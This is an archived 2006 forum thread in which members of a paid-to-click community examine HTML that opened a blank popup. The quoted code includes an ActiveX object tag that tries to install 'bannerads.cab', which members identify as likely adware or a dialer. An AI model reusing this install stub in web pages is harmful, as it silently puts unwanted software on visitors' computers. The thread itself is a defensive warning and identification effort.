Help - Search - Members - Calendar
Full Version: Installing BannerAds?
Get Paid Forum - Get Paid Discussion > Get Paid To Programs > Sites Allegedly with problems of hacking/virus/0-iframes, autosearches etc ... > Others
Essperanza
Nov 13 2006, 05:12 PM
What's this? It opens a blank page. I came across this twice and the first time I thought I'd accidentally clicked a link or something but now it happened again on a different program.

QUOTE
<html>
<head>
<title>Installing BannerAds</title>
</head>
<body>
<p>
<object height="1" width="1" classid="clsid:1E1B286C-88FF-11D2-8D96-D7ACAC95951F" codebase="bannerads.cab#Version=-1,-1,-1,-1" id="obj">
</object>
</p>
</body>
</html>

<center>
<!--- start of focusIN code --->
<script language="JavaScript">
<!--
var now = new Date();
var uaid = now.getTime() % Math.floor(8640000 - Math.random()*1000);
document.write('<scr'+'ipt src="http://focusin.ads.targetnet.com//ad/id=seeke&opt=hjj&rw=300&rh=250&urlid=2&cv=220&uid=' + uaid + '" ></scr'+'ipt>');
//-->
</script>

<noscript>
<iframe allowTransparency="true" src="http://focusin.ads.targetnet.com//ad/id=seeke&opt=hhn&rw=300&rh=250&urlid=2&cv=220&uid=1" width=300 height=250 frameborder=0 marginheight=0 marginwidth=0 scrolling="no">
<a href="http://focusin.ads.targetnet.com//ad/id=seeke&opt=cin&rw=300&rh=250&urlid=2&cv=220&uid=1" target="_top"><img
src="http://focusin.ads.targetnet.com//ad/id=seeke&opt=hin&rw=300&rh=250&urlid=2&cv=220&uid=1" alt="Click here to visit our sponsor" width=300 height=250 border=0></a>
</iframe>
</noscript>
<!--- end of focusIN code --->

ReferYou
Nov 13 2006, 06:49 PM
This is the ad code for mammamediasolutions.

Looks like it does a little math to determine what you saw on your last visit to determine what you should see this visit, then displays a banner. The code above will display a 300X250 banner.

I get a java block on this every time I click on a DonkeyMails PTP and Spysweeper doesn't like it as it is trying to deposit adware cookies on your PC and adblock makes sure you dont' even see the graphical result.
Essperanza
Nov 13 2006, 07:03 PM
Thanks! Looks like I'm lucky for using a Mac if all it does for me is open a blank window smile.gif
wagdoll
Nov 15 2006, 07:36 AM
The lower half of the code is from mamma media, the top half is a separate code from "bannerads", and this part IS bad. (you can see it's separate and not from mamma as there's a </html> between the two wink.gif )

It does something in the registry that it shouldn't and if it gets on you need to remove it with hijackthis.

This link may help anyone who has got it on their system

http://www.castlecops.com/check171863next.html

I "think" it's a dialler that it's putting out - unless anyone else can see what it's doing?

I am going to disagree with my first assessment and now suggest it is this:

http://www.trendmicro.com/vinfo/virusencyc....AP&VSect=T

You can see the identical clsid in there, I don't see why there would be a match unless it's the same thing, and a banner that is "installing" sounds like bad news to me.
Alternate match:
http://www.trendmicro.com/vinfo/grayware/v...DW%5FDNSERR%2EA



Take your pick, I don't think you want either dry.gif

JACKIE1944
Dec 11 2006, 03:24 PM
Beaver has this running in their ptp at the moment.I have just suspended all beaver on our site as I have been unable to contact the owner,keep getting an error message.
wagdoll
Dec 11 2006, 06:50 PM
We've been pausing them on SAS for this reason too.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.